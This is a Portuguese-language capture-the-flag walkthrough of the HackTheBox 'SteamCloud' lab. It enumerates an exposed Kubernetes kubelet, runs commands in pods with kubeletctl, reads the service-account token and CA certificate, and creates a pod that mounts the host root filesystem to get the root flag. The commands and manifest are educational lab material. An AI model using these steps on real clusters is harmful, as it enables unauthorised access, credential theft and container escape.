SteamCloud

Difficulty: Easy | OS: Linux | Kubernetes

Last updated 2 months ago

SteamCloud

Difficulty: Easy | OS: Linux | Kubernetes

Walkthrough - Youtube Habemus Shell

HackTheBox Machine

Scanning

rustscan -a 10.10.11.133 -u 50000

Services and Versions

sudo nmap -sC -Pn -p 22,8443,10256,10250,10249 -sV 10.10.11.133 -T5

Exploration

Port 8443 - HTTPs

Não podemos acessar a raiz do site.
Vamos realizar um fuzzing:

feroxbuster -u https://10.10.11.133:8443/ -w /usr/share/seclists/Fuzzing/fuzz-Bo0oM.txt  -t 200 -x html,php,txt,js,py,pdf,zip -n -k

Nada de interessante pra gente.

Port 10250 - Kubelet

Podemos interagir então com o kubelet através do utilitário kubeletctl
Enumerar os pods.

kubeletctl -s 10.10.11.133 pods

Temos aqui então apenas namespaces que são criados por padrão. Porém, temos um Pod que está no namespace de default ou seja, não criaram um namespace para segregar ele.
Vamos verificar quais pods temos permissão de execução remota de código.[RCE]

kubeletctl -s 10.10.11.133 scan rce

Observe que na coluna RCE temos um + , ou seja, podemos executar comandos remotamente nesses Pods.
Vamos interagir então com o pod do nginx para confirmar essa vulnerabilidade.

kubeletctl -s 10.10.11.133 exec "id" -p nginx -c nginx -n default

# exec = execução de comandos
# -p = pod
# -c = container
# -n = namespace

Confirmamos então que podemos executar comandos nesse POD, então podemos ler a nossa primeira flag:

kubeletctl -s 10.10.11.133 exec "cat /root/user.txt" -p nginx -c nginx -n default

Privilege Escalation

Já somos root nesse pod, mas não temos acesso ao volume que esta montada a verdadeira pasta root.
Então precisamos fazer essa montagem. Podemos criar um novo pod para explorarmos isso.
Antes disso, precisamos obter um token e um certificado para podermos ver as permissões que temos e para criarmos um novo Pod.
Normalmente o token fica no caminho:
- /var/run/secrets/kubernetes.io/serviceaccount/token
E os certificados ficam em:
- /var/run/secrets/kubernetes.io/serviceaccount/ca.crt
Extrair o token:

kubeletctl -s 10.10.11.133 exec "cat /var/run/secrets/kubernetes.io/serviceaccount/token" -p nginx -c nginx -n default

Vamos colocar esse token em uma variável de ambiente chamava token:

export token="<token>"

Obter o certificado:

kubeletctl -s 10.10.11.133 exec "cat /var/run/secrets/kubernetes.io/serviceaccount/ca.crt" -p nginx -c nginx -n default

Salva ele em um arquivo com o mesmo nome: ca.crt
Agora podemos usar o utilitário Kubectl para podermos verificar as permissões que temos com esse token no cluster Kubernetes.

kubectl --token=$token --certificate-authority=ca.crt --server=https://10.10.11.133:8443 auth can-i --list 

# --token = token que colocamos como variavel de ambiente
# --certifica-authority = o certificado que salvamos como ca.crt
# auth = inspecionar autorização
# can-i = checar se uma ação é permitida
# --list = liste essas permissões

Observe que no recurso dos Pods, nosso token tem permissão de get, create, list
Então vamos criar um novo pod de forma declarativa, ou seja, com um arquivo .yaml
Podemos usar o .yaml de um pod já em execução como modelo, e aqui como não conseguiríamos baixar uma nova imagem para o container, podemos reaproveitar a que já tem no alvo.

kubectl --token=$token --certificate-authority=ca.crt --server=https://10.10.11.133:8443 get pods -o yaml

Podemos simplificar bastante esse .ymlpenas colocando o que é necessário para criarmos o pod e montarmos o volume.

apiVersion: v1
kind: Pod
metadata:
  name: exploit-pqd1
  namespace: default
spec:
  containers:
    - name: exploit-pqd-container1
      image: nginx:1.14.2
      volumeMounts:
        - mountPath: /root
          name: volume-montado-no-root
  volumes:
    - name: volume-montado-no-root
      hostPath:
        path: /

Agora podemos simplesmente criar esse pod de forma declarativa informando o arquivo .yml

kubectl --token=$token --certificate-authority=ca.crt --server=https://10.10.11.133:8443 apply -f pqd.yml

Refazemos o comando com Kubeletctl para verificarmos se foi criado o nosso pod.

kubeletctl -s 10.10.11.133 pods

Agora podemos executar comandos nesse pod, para tentarmos ler a flag de root final

Agora conseguimos ver que dentro da pasta de root, temos a pasta verdadeira do root, e listando ela, conseguimos ver a última flag e lê-la.

Pessoal, viram que algumas vezes eu escrevi .yaml e outras .yml , isso foi erro mesmo rsrs.

Mas elas realmente existem, sua diferença é bem sutil e na prática não faz diferença no Kubernetes ou em muitas outras ferramentas.

Bizu é sempre manter a consistência, se começou com .yaml continua usando-a, e vice-versa.

PreviousCap NextBucket

Last updated 2 months ago